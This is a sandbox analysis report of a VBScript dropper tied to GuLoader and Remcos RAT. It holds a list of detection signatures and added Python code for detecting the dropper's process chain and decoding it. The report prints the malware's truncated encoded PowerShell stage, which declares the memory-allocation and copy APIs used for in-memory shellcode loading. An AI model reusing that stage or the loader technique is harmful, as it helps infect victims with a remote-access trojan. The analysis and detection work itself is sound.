Windows Analysis Report
Sursdep.vbs
Overview
General Information
Detection: GuLoader, Remcos
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Yara detected Remcos RAT
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected MSILDownloaderGeneric
Yara detected GuLoader
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
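Three of the signatures above are process-level behaviours that a SOC can detect from endpoint telemetry alone: a script host (wscript.exe or cscript.exe) launching PowerShell, an -EncodedCommand style option on the command line, and an unusually long command line. The following is an added example written for this edit, not part of the sandbox report, that expresses those three checks as detection logic and runs them over constructed Sysmon-style process-creation records (pid/ppid fields model the process tree; the long base64 blob in the PID 6460 record is a placeholder, not the real payload). Function names, the 1024-character threshold and the record layout are assumptions.

```python
# Constructed Sysmon-style process-creation records (not taken from the report):
# pid/ppid model the process tree so a parent chain can be walked. PID 6460's
# record mirrors the report's wscript -> powershell -EncodedCommand launch; the
# encoded blob is a constructed placeholder, not the real one.
EVENTS = [
    {"pid": 1000, "ppid": 4, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 2768, "ppid": 1000, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\user\Desktop\Sursdep.vbs"'},
    {"pid": 6460, "ppid": 2768,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -EncodedCommand "IwBi' + "A" * 2000 + '"'},
    # Same technique routed through cmd.exe, with a short blob (constructed).
    {"pid": 3100, "ppid": 1000, "image": r"C:\Windows\System32\cscript.exe",
     "cmd": "cscript.exe logon.vbs"},
    {"pid": 3101, "ppid": 3100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c powershell -enc UABhAGMAawBlAHIA"},
    {"pid": 3102, "ppid": 3101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -enc UABhAGMAawBlAHIA"},
    # Ordinary admin use: explorer -> powershell with a script file (constructed).
    {"pid": 4200, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# powershell.exe accepts any prefix of -EncodedCommand (down to -e) plus -ec,
# so matching only the full spelling would miss most real launches.
ENCODED_FLAGS = {"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}
LONG_CMDLINE = 1024  # threshold is an assumption; tune to your environment


def basename(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event: dict, by_pid: dict, depth: int = 3) -> list:
    """Walk ppid links up to `depth` levels, so a script host that goes
    through cmd.exe ('via cmd or directly') is still found."""
    chain, cur = [], event
    for _ in range(depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            break
        chain.append(cur)
    return chain


def has_encoded_flag(cmd: str) -> bool:
    """True if any token is an -EncodedCommand option in any accepted spelling."""
    return any(tok.lstrip("-/").lower() in ENCODED_FLAGS for tok in cmd.split())


def evaluate(events: list) -> dict:
    """Map PID -> signature names for each PowerShell launch that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        if basename(e["image"]) not in POWERSHELL:
            continue
        hits = []
        parents = {basename(a["image"]) for a in ancestors(e, by_pid)}
        if parents & SCRIPT_HOSTS:
            hits.append("wscript_starts_powershell")
        if has_encoded_flag(e["cmd"]):
            hits.append("encoded_cmdline")
        if len(e["cmd"]) > LONG_CMDLINE:
            hits.append("very_long_cmdline")
        if hits:
            findings[e["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in evaluate(EVENTS).items():
        print(pid, ", ".join(hits))
```

Only the two script-host-spawned PowerShell processes are reported; the admin launch with a script file trips none of the rules. The parent walk is what separates this from a naive ParentImage check: the cscript -> cmd -> powershell chain is caught at depth two.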
Classification
- System is w10x64native
- wscript.exe (PID: 2768 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Sursdep.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
  - powershell.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcw
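The -EncodedCommand value in the process tree is base64 over UTF-16LE text, which is why the report flags an "encrypted" cmdline option and a very long command line. The following is an added example written for this edit, not tooling from the sandbox report: it decodes the captured value and pulls the P/Invoke declarations out of the Add-Type block, which is where a GuLoader PowerShell stage declares its memory primitives. The report cuts the string off mid-way, so the decoder trims to a whole base64 quantum and a partial last line is expected. The SHELLCODE_APIS list is an analyst heuristic assumed for this example, and the function names are the editor's.

```python
import base64
import re

# The -EncodedCommand value recorded for powershell.exe (PID 6460) in the
# process tree, with the extraction-artifact spaces removed. The report cuts
# it off mid-string, so the tail decodes to a partial junk-word comment.
ENCODED_COMMAND = (
    "IwBi"
    "AHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABN"
    "AGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBz"
    "AHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBh"
    "AGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBT"
    "AFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBE"
    "AEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5"
    "ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAi"
    "AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAu"
    "AFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBs"
    "AGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewAN"
    "AAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBj"
    "ACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBt"
    "AG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAy"
    "ACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBE"
    "AGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBp"
    "AG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBd"
    "AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBu"
    "AHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAs"
    "AGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABp"
    "AGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7"
    "AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAg"
    "AHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABv"
    "AHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1"
    "ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABl"
    "AGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBl"
    "ADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBz"
    "AHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBu"
    "ADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBh"
    "AHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBp"
    "AHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcw"
)

# Analyst heuristic (assumption, not from the report): exports that, declared
# together in an Add-Type block, are the allocate / copy / execute primitives
# of in-memory shellcode loaders such as GuLoader's PowerShell stage.
SHELLCODE_APIS = {
    "VirtualAlloc", "NtAllocateVirtualMemory", "VirtualProtect",
    "NtProtectVirtualMemory", "RtlMoveMemory", "CreateThread",
    "EnumWindows", "CallWindowProcW", "EnumSystemLocalesA",
}


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand value: base64 over UTF-16LE text.
    Tolerates a truncated capture by trimming to a whole base64 quantum and
    dropping a dangling odd byte."""
    b64 = re.sub(r"\s+", "", b64)
    b64 = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(b64)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


PINVOKE_RE = re.compile(
    r'\[DllImport\("([^"]+)"(?:\s*,\s*EntryPoint\s*=\s*"([^"]+)")?\)\]\s*'
    r"public\s+static\s+extern\s+[\w.]+\s+(\w+)\s*\("
)
CLASS_RE = re.compile(r"public\s+static\s+class\s+(\w+)")


def extract_pinvoke(script: str) -> list:
    """(library, real export, C# alias) for each DllImport. GuLoader hides the
    export behind EntryPoint= and gives the method a random name (here VA)."""
    return [(lib, entry or alias, alias)
            for lib, entry, alias in PINVOKE_RE.findall(script)]


def triage(b64: str) -> dict:
    """Decode and summarise: class name, imports, flagged exports, junk lines."""
    script = decode_encoded_command(b64)
    imports = extract_pinvoke(script)
    m = CLASS_RE.search(script)
    lines = script.splitlines()
    return {
        "class": m.group(1) if m else None,
        "imports": imports,
        "flagged": sorted({exp for _, exp, _ in imports if exp in SHELLCODE_APIS}),
        "comment_lines": sum(1 for ln in lines if ln.startswith("#")),
    }


if __name__ == "__main__":
    print(decode_encoded_command(ENCODED_COMMAND))
    report = triage(ENCODED_COMMAND)
    for lib, export, alias in report["imports"]:
        print(f"{lib:10} {export:24} as {alias}")
    print("flagged:", report["flagged"])
```

Decoding recovers a line of junk words behind a `#` comment, then `Add-Type -TypeDefinition` declaring a class Hexastich1 with RtlMoveMemory from KERNEL32, NtAllocateVirtualMemory from ntdll.dll aliased to VA, and EnumWindows from USER32, followed by another junk-word comment where the capture ends. Allocate, copy, and a user32 API that takes a callback pointer are the usual primitives for running shellcode from PowerShell without touching disk, which lines up with the "Compiles C# or VB.Net code" and "Writes to foreign memory regions" signatures above; the EntryPoint= alias is why string-matching on the method name alone misses the ntdll call.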